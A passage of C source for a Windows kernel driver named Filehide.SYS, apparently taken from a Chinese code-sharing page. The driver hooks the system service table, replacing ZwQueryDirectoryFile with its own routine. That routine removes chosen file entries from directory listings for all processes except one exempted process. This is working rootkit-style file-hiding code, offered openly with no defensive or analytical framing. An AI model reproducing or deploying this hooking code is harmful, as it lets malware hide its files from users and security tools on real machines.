📄 sfilter.c
字号:
//PCWSTR str2=name;
//if (str==str2) //不分大小写的比较现两个字符串
if(memcmp(SkipExe,name,strlen(SkipExe))==0) //对于我指定的进程不隐藏。
{
DbgPrint(("隐藏了文件放行%s\n",name));
}else
{
DbgPrint(("隐藏了文件%s\n",name));
rc = 0x80000006; //hide
}
}
else
pLast->dwLenToNext = 0;
break;
}
else
{
int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos-p->dwLenToNext;
RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p +p->dwLenToNext ), (DWORD)iLeft );
continue;
}
}
pLast = p;
p = (PDirEntry)((char *)p + p->dwLenToNext );
}while( !bLastOne );
RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
RtlFreeAnsiString(&aFilehide);
}
return(rc);
}
//----------------------------------------------------------------------
//
// Hook System Call
//
// Replaces entries in the system service table with pointers to
// our own hook routines. We save off the real routine addresses.
//
//----------------------------------------------------------------------
VOID HookSystemCall( void )
{
//
// Hook everything
//Hook我的函数
RealZwQueryDirectoryFile = SYSCALL( ZwQueryDirectoryFile );
SYSCALL( ZwQueryDirectoryFile ) = (PVOID) HookZwQueryDirectoryFile;
}
//----------------------------------------------------------------------
//
// Unhook System Call
//
//----------------------------------------------------------------------
VOID UnhookSystemCall( )
{
//
// Unhook everything
//还原原来的API函数
SYSCALL( ZwQueryDirectoryFile ) = (PVOID) RealZwQueryDirectoryFile;
}
//----------------------------------------------------------------------
//
// FilehideDispatch
//
//----------------------------------------------------------------------
NTSTATUS FilehideDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
PIO_STACK_LOCATION irpStack;
//
// Go ahead and set the request up as successful
//
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
//
// Get a pointer to the current location in the Irp. This is where
// the function codes and parameters are located.
//
irpStack = IoGetCurrentIrpStackLocation (Irp);
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
DbgPrint(("Filehide: IRP_MJ_CREATE\n"));
break;
case IRP_MJ_SHUTDOWN:
DbgPrint(("Filehide: IRP_MJ_CREATE\n"));
break;
case IRP_MJ_CLOSE:
DbgPrint(("Filehide: IRP_MJ_CLOSE\n"));
break;
case IRP_MJ_DEVICE_CONTROL:
DbgPrint (("Filehide: IRP_MJ_DEVICE_CONTROL\n"));
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return STATUS_SUCCESS;
}
//----------------------------------------------------------------------
//
// RegmonUnload
//
// Our job is done - time to leave.
//
//----------------------------------------------------------------------
VOID FilehideUnload( IN PDRIVER_OBJECT DriverObject )
{
WCHAR deviceLinkBuffer[] = L"\\DosDevices\\Filehide";
UNICODE_STRING deviceLinkUnicodeString;
DbgPrint(("Filehide.SYS: unloading\n"));
//
// Unhook the system call
//
UnhookSystemCall();
//
// Delete the symbolic link for our device
//
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
//
// Delete the device object
//
IoDeleteDevice( DriverObject->DeviceObject );
DbgPrint(("Filehide.SYS: deleted devices\n"));
}
//----------------------------------------------------------------------
//
// DriverEntry
//
// Installable driver initialization. Here we just set ourselves up.
//
//----------------------------------------------------------------------
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING
RegistryPath )
{
NTSTATUS ntStatus;
WCHAR deviceNameBuffer[] = L"\\Device\\Filehide";
UNICODE_STRING deviceNameUnicodeString;
WCHAR deviceLinkBuffer[] = L"\\DosDevices\\Filehide";
UNICODE_STRING deviceLinkUnicodeString;
DbgPrint (("Filehide.SYS: entering DriverEntry\n"));
//
// Setup our name and symbolic link
//
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
ntStatus = IoCreateDevice ( DriverObject,
0,
&deviceNameUnicodeString,
FILE_DEVICE_HIDE,
0,
TRUE,
&ControlDeviceObject );
if (NT_SUCCESS(ntStatus)) {
//
// Create a symbolic link that the GUI can specify to gain access
// to this driver/device
//
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
//
// Create dispatch points for all routines that must be handled
//
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] =
FilehideDispatch;
//
// Find the process name offset
//
#if DBG
DriverObject->DriverUnload = FilehideUnload;
#endif
}
if (!NT_SUCCESS(ntStatus)) {
DbgPrint(("Filehide: Failed to create our device!\n"));
//
// Something went wrong, so clean up (free resources etc)
//
if( ControlDeviceObject ) IoDeleteDevice( ControlDeviceObject );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
return ntStatus;
}
//
// Pointer to system table data structure is an NTOSKRNL export
//
ServiceTable = KeServiceDescriptorTable;
DbgPrint(("Filehide: Servicetable: %x\n", ServiceTable ));
HookSystemCall();
DbgPrint(("Filehide: Hook System Call"));
return STATUS_SUCCESS;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -